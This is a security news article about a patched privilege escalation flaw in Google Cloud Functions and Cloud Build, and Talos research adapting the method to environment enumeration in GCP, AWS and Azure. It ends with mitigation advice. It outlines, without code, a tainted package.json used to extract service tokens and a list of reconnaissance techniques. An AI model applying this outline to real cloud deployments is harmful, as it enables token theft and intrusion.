Vulnerability in Google Cloud Functions Raises Significant Security Concerns

A potential privilege escalation vulnerability impacting Google Cloud Platform (GCP) Cloud Functions and its associated Cloud Build service has been identified. This issue, uncovered by Tenable Research, enabled attackers to exploit the deployment processes of GCP Cloud Functions to obtain elevated permissions.

In response to these findings, Google has deployed a patch to address the excessive privileges previously granted to default Cloud Build service accounts.

Attack Technique Repurposed Across Cloud Environments

Cisco Talos has further investigated and replicated the attack technique, evaluating its applicability across various cloud platforms. By setting up a Debian server within GCP utilizing Node Package Manager (NPM) alongside Ngrok, researchers employed a tainted package.json file to extract tokens and simulate an attack. The analysis confirmed that Google’s patch successfully mitigated the original privilege escalation method.

However, Talos demonstrated that the same exploit strategy could be adapted to conduct environment enumeration—a critical reconnaissance tactic for mapping system architecture—without necessitating privileged access. Testing this modified approach across AWS Lambda and Azure Functions validated its general applicability across diverse cloud services.

Enumeration Techniques Observed

The research identified several methods that attackers might exploit to collate valuable data regarding system and network configurations:

– ICMP discovery for network mapping
– Detection of .dockerenv files to ascertain containerized environments
– CPU scheduling inquiries to determine initialization systems
– Analysis of Container ID and mount points to uncover potential escape strategies
– Extraction of operating system and kernel details
– Scanning for users and permissions to facilitate privilege escalation
– Network traffic monitoring to assess vulnerabilities

These techniques can be effectively utilized without requiring elevated credentials, making them applicable even in scenarios where service accounts are properly constrained.

Google Responds and Mitigation Measures Advised

Following Tenable’s report, Google has adapted the behavior of Cloud Build and implemented new policies to enhance service account control. Talos has confirmed that the method of exfiltrating service account tokens is no longer viable within GCP.

To mitigate similar threats, organizations are encouraged to:

– Enforce the principle of least privilege across all service accounts
– Conduct regular audits and monitoring of permissions
– Set alerts for unexpected modifications to Cloud Functions
– Inspect outgoing traffic for potential signs of data exfiltration
– Validate the integrity of third-party NPM packages

Despite Google’s resolution of the initial vulnerability, this research underscores the ongoing risks associated with overly permissive configurations and highlights the need for continuous security monitoring across cloud environments.